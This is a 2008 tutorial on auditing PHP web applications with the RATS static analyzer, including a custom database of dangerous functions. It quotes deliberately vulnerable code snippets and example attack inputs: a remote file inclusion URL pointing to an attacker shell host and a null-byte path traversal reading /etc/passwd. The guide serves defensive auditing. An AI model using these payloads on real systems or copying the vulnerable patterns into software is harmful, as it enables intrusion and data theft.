Using RATS to Audit PHP Web Applications (c) 2008 dB RATS Home: http://www.fortifysoftware.com/security-resources/rats.jsp HTML Version: http://rawsecurity.org/articles/RATS.html + Introduction RATS, Rough Auditing Tool for Security, is a free security auditing utility that scans C, C++, PHP, Perl, and Python source code. The tool does not find definite security bugs in the source code, but will simply find potentially dangerous function calls and give a brief description of the problem and possible remedies. While it can find many common security related programming errors, such as buffer overflows and race conditions, RATS is not geared to finding many of the common security vulnerabilities that plague web applications. Luckily, RATS can be given a custom vulnerability database in XML format to help identify issues such as cross-site scripting, SQL injection, remote file inclusion, and command injection vulnerabilities. + Basic Usuage Once you have RATS installed on your machine simply run the following command in the same directory of the PHP application in question. rats . A portion of the output is shown below. ./src/plugins/contact-form/plugin-func.php:280: High: mail ./src/plugins/gallery/plugin-func.php:656: High: mail ./src/plugins/guestbook/plugin-func.php:376: High: mail Arguments 1, 2, 4 and 5 of this function may be passed to an external program. (Usually sendmail). Under Windows, they will be passed to a remote email server. If these values are derived from user input, make sure they are properly formatted and contain no unexpected characters or extra data. RATS will scan each file specified and produce a vulnerability report once it is done. As you can see from the output, RATS located three uses of the mail function in the entire application. The filenames, line numbers, and warning levels will all be shown. You should then crack open each file and make sure that the input to the mail function isn't vulnerable to email injection. By default RATS will only show high and medium severity vulnerabilities. To show all possible problems use the following command, rats . -w 3 + Vulnerability Databases RATS stores vulnerability information in XML format which makes it easy to alter. Consider a small example below. include High The include() statement includes and evalutes the specified file. Make sure the input is properly sanitized to prevent a user from including a local or remote file. As you might have guessed, name is the name of the questionable method. Possible values for severity are High, Medium, or Low and correspond with the 1, 2, and 3 warning levels using the -w option. The description will be displayed to the user when the method is found in a source code file. The -d command-line parameter allows a user to specify RATS to use an additional vulnerability database. In order to suppress the default databases use the -x option. Partial output of running rats . -d myVulDB.XML is shown below. ./vuln.php:34: High: include The include() statement includes and evalutes the specified file. Make sure the input is properly sanitized to prevent a user from including a local or remote file. At this point you may want to look into how remote file inclusion works to understand why methods such as include and require should be scrutinized. + Function Explanations I've put together a vulnerability database specifically for web application audits available here (http://rawsecurity.org/articles/rats.xml). If you know of any additional PHP methods that should be identified in a security audit, then don't hesitate to send me an email. A brief description of each function in the database is shown below. base64_decode - Not dangerous by itself, but could be used to bypass magic_quotes_gpc. bzopen - See file. eval - Very dangerous. Evalutes a string as PHP code. Check for possible code injection. exec - Using user input with exec is very dangerous and could lead to a command injection vulnerability. extract - Imports variables from an array into the symbol table. Example vulnerable code. extract($_GET); require($BASEDIR . "platform/fs.php"); Very dangerous if the array happens to be _GET, _POST, or _COOKIE. index.php?basedir=http://path/to/attacker/shell/ file - Check for a local file inclusion vulnerability. If the allow_url_fopen config directive is enabled then the file method can open remote resources as well. file_get_contents - See file. fopen - See file. gzopen - See file. header - The header method could be used for a HTTP Response Splitting or XSS attack. import_request_variables - Imports GET, POST, and/or Cookie variables into the global scope. This is like enabling register_globals on one specific form. Could lead to many different types of vulnerabilities. include - Possible code injection if the include method takes user input and it is not properly filtered. Example vulnerable code. include "/pages/{$_GET['page']}.html"; Depending on the environment it might be possible to terminate a string with the null character. This allows an attacker to get rid of the file extension (html in the example). index.php?page=../../../../etc/passwd%00 include_once - See include. mssql_query - Executes a query against a SQL Server database. Check how the user input is filtered for possible SQL injections. Example vulnerable code. $sql = "SELECT * FROM pages WHERE id = $_POST['id']"; mssql_query($sql); Not vulnerable if magic quotes is on. $sql = "SELECT * FROM pages WHERE id = '" + $_POST['id'] + "'"; mssql_query($sql); mysql_query - Executes a query against a MySQL database. See mssql_query. odbc_exec - Executes a SQL statements using Open Database Connectivity. See mssql_query. passthru - See exec. pg_query - Executes a query against a PostgreSQL database. See mssql_query. phpinfo - The phpinfo method shows configuration information about PHP. Depending on how the application is written, database access credentials may be exposed. popen - See file. preg_replace - Useful for making string replacements, but carries the same risk as the eval method if the 'e' modifier is used. The replacement parameter will be run as PHP code after the string replacement. proc_open - See exec. readfile - See file. require - See include. require_once - See include. setcookie - The setcookie method could be used for a HTTP Response Splitting or XSS attack. shell_exec - See exec. system - See exec. unserialize - Not dangerous by itself, but could be used to bypass magic_quotes_gpc. urldecode - Not dangerous by itself, but could be used to bypass magic_quotes_gpc. urldecode will convert %2527 into a single quote. + Summary As the name implies, RATS only provides a rough starting point to finding software vulnerabilities in applications. White box and black box testing should be used together to uncover security related bugs.